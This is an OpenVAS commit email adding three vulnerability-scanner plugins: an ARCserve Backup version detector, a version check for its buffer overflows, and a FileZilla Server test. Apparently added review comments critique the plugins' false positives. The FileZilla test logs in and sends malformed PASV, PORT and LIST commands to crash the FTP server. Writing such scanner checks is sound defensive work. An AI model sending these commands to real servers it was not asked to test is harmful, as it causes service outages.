[Openvas-commits] r7206 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri Apr 2 10:10:30 CEST 2010
Author: glicina
Date: 2010-04-02 10:10:27 +0200 (Fri, 02 Apr 2010)
New Revision: 7206
Added:
trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl
trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl
trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/ChangeLog 2010-04-02 08:10:27 UTC (rev 7206)
@@ -1,3 +1,10 @@
+2010-04-02 Goran Licina <goran.licina at lss.hr>
+
+ * scripts/arcserve_backup_detect.nasl,
+ scripts/arcserve_backup_mult_bof_vuln.nasl,
+ scripts/filezilla_server_port_cmd_dos.nasl:
+ Added new plugins.
+
2010-04-01 Michael Meyer <michael.meyer at intevation.de>
* scripts/cherokee_0_4_7.nasl,
Added: trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl 2010-04-02 08:10:27 UTC (rev 7206)
@@ -0,0 +1,77 @@
+###################################################################
+# OpenVAS Vulnerability Test
+#
+# CA ARCServe Backup Detect
+#
+# LSS-NVT-2010-002
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2010 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+# need description here to change it later
+desc = "
+Remote host is running CA ARCServe Backup for Laptops and Desktops.
+
+See also:
+http://arcserve.com/us/products/product.aspx?id=5282
+";
+
+if(description)
+{
+ script_id(102017);
+ script_version("$Revision$");
+ script_name("CA ARCServe Backup Detect");
+ script_description(desc);
+ script_tag(name:"risk_factor", value:"None");
+ script_summary("Detects CA ARCServe Backup for Laptops and Desktops on remote hosts");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 LSS");
+ script_family("Service detection");
+ script_require_ports(1900);
+ exit(0);
+}
+
+port=1900;
+
+# check for open port
+if (!get_port_state(port)) exit(0);
+
+soc = open_sock_tcp(port);
+if (!soc) exit(0);
+
+# Get server version
+senddata = string("0000000019rxrGetServerVersion\n");
+send(socket:soc, data:senddata);
+r = recv_line(socket:soc, length:1000);
+
+# extract version
+match = eregmatch(pattern:"[0-9]+\.[0-9]+\.[0-9]+",string:r);
+
+if(match) {
+ set_kb_item(name:string("arcserve/", port, "/version"),value:match[0]);
+
+ if(report_verbosity > 0) {
+ info = "CA ARCServe Backup for Laptops and Desktops r" + match[0];
+ info = '\n' + "The following version of CA ARCServe Backup for Laptops and Desktops is detected: "+'\n\n'+info;
+ desc += info;
+ security_note(port:port, data:desc);
+ }
+}
+
+close(soc);
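Review bot: The version extraction near the end of the script accepts any dotted triple found anywhere in the first reply line, so another service answering on TCP 1900, or a reply that merely contains an IP-like string, would be stored as `arcserve/1900/version`. That key later drives the Critical finding in arcserve_backup_mult_bof_vuln.nasl, so a false detection propagates. The reply `r` is also never checked before matching. Add `if (!r) { close(soc); exit(0); }` and tie the pattern to the reply format the server returns for rxrGetServerVersion (not visible in this commit) instead of matching anywhere in the line. A short comment on the `0000000019` prefix, which appears to be the length of the 19-character command name, would help the next maintainer.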
Property changes on: trunk/openvas-plugins/scripts/arcserve_backup_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl 2010-04-02 08:10:27 UTC (rev 7206)
@@ -0,0 +1,74 @@
+###################################################################
+# OpenVAS Vulnerability Test
+#
+# CA ARCserve Backup Multiple Buffer Overflow Vulnerabilities
+#
+# LSS-NVT-2010-003
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2010 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+if(description)
+{
+ script_id(102018);
+ script_version("$Revision$");
+ script_cve_id("CVE-2007-5003");
+ script_bugtraq_id(24348);
+ script_name("CA ARCserve Backup Multiple Bufffer Overflow Vulnerabilities");
+ desc = "
+ Overview:
+ Multiple stack-based buffer overflows in CA (Computer Associates)
+ BrightStor ARCserve Backup for Laptops and Desktops r11.0 through
+ r11.5 allow remote attackers to execute arbitrary code via a long
+ (1) username or (2) password to the rxrLogin command in rxRPC.dll,
+ or a long (3) username argument to the GetUserInfo function.
+
+ Solution:
+ The vendor released an advisory and updates to address these issues.
+ Please see the references for more information.
+
+ References:
+ https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=156002
+ http://research.eeye.com/html/advisories/published/AD20070920.html
+ ";
+ script_description(desc);
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_summary("Checks if version of CA ARCServe Backup is between r11.0 and r11.5");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 LSS");
+ script_family("Buffer overflow");
+ script_dependencie("arcserve_backup_detect.nasl");
+ exit(0);
+}
+
+arcserve_port = 1900;
+
+if(!get_port_state(arcserve_port)) exit(0);
+
+ver = get_kb_item(string("arcserve/", arcserve_port, "/version"));
+
+if (!ver) exit(0);
+
+if(eregmatch(pattern:"11\.[0-5]+\.[0-9]+",string:ver)) {
+ security_hole(arcserve_port);
+ exit(0);
+}
+
+exit(0);
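Review bot: The pattern `11\.[0-5]+\.[0-9]+` in the final check is unanchored and lets the minor field repeat, so stored values such as 111.0.1 or 11.10.0 would also be reported as a hole. Using `eregmatch(pattern:"^11\.[0-5]\.[0-9]+$", string:ver)` limits it to the r11.0 to r11.5 range the summary describes. The check ignores the third version field, so an r11.5 host with the vendor update applied would presumably still be flagged; compare against fixed build numbers if they are known, otherwise state in the description that the result is version-based only. Separately, `script_name` spells "Bufffer", and unlike the detection script this one has no `script_require_ports(1900)`.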
Property changes on: trunk/openvas-plugins/scripts/arcserve_backup_mult_bof_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
===================================================================
--- trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl 2010-04-01 13:45:54 UTC (rev 7205)
+++ trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl 2010-04-02 08:10:27 UTC (rev 7206)
@@ -0,0 +1,128 @@
+###################################################################
+# OpenVAS Vulnerability Test
+#
+# FileZilla Server Port Command Denial of Service
+#
+# LSS-NVT-2010-007
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2010 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+desc = "
+Overview:
+FileZilla Server before 0.9.22 allows remote attackers to
+cause a denial of service (crash) via a wildcard argument
+to the (1) LIST or (2) NLST commands, which results in a
+NULL pointer dereference, a different set of vectors than
+CVE-2006-6564.
+NOTE: CVE analysis suggests that the problem might be due
+to a malformed PORT command.
+
+Solution:
+Upgrade vulnerable FTP server to latest version.
+
+References:
+http://osvdb.org/34435
+";
+
+if(description)
+{
+ script_id(102019);
+ script_version("$Revision$");
+ script_cve_id("CVE-2006-6565");
+ script_bugtraq_id(21542);
+ script_bugtraq_id(21549);
+ script_tag(name:"cvss_base", value:"4.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("FileZilla Server Port Command Denial of Service");
+ script_description(desc);
+ script_summary("Attempts a DoS attack on Filezilla FTP Server");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (C) 2010 LSS");
+ script_family("FTP");
+ script_dependencies("logins.nasl");
+ exit (0);
+}
+
+if (safe_checks()) exit (0);
+
+report = "
+-------------------------------------------------------
+Plugin output:
+
+OpenVAS was able to crash the remote FTP server by sending
+a malformed PASV command.";
+
+include ("ftp_func.inc");
+
+user = get_kb_item("ftp/login");
+pass = get_kb_item("ftp/password");
+
+if (!user) exit(0);
+if (!pass) exit(0);
+
+attack = "A*";
+
+port = get_kb_item("Services/ftp");
+
+if (!port) port = 21;
+
+if (!get_port_state(port)) exit (0);
+
+soc = open_sock_tcp(port);
+
+if (!soc) exit (0);
+
+###################
+###step 1: login###
+###################
+
+cmd = "USER " + user;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+cmd = "PASS " + pass;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+########################
+###step 2: the attack###
+########################
+
+cmd = "PASV " + attack;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+cmd = "PORT " + attack;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+cmd = "LIST " + attack;
+ftp_send_cmd (socket:soc, cmd:cmd);
+
+###############################
+###step 3: attack succeeded?###
+###############################
+
+is_alive = ftp_recv_line(socket:soc);
+
+if (!is_alive) {
+ report = desc + report;
+ security_warning(data:report, port:port);
+}
+
+#end of exploit, closing open socket
+
+close(soc);
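Review bot: The step 3 check treats an empty `ftp_recv_line()` on the existing socket as proof of a crash, but an empty read can also be a timeout or the server dropping the session, so a healthy server can be reported as vulnerable. The replies to USER and PASS are discarded as well, so the script continues even when the login was rejected; the return value of `ftp_send_cmd` for PASS should be checked and the script should exit on a non-2xx reply. Confirming the result by reconnecting to the port, as sketched below, would make the finding more reliable. The report text also says "malformed PASV command" while the script name and description refer to PORT and LIST/NLST, so the wording should be aligned.

```nasl
# ... unchanged: login and the three commands of step 2 ...

close(soc);

# Report only if the service no longer accepts connections; an empty read
# on the old socket can also be a timeout or a server-side disconnect.
soc2 = open_sock_tcp(port);
if (!soc2) {
  report = desc + report;
  security_warning(data:report, port:port);
  exit(0);
}
close(soc2);
```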
Property changes on: trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision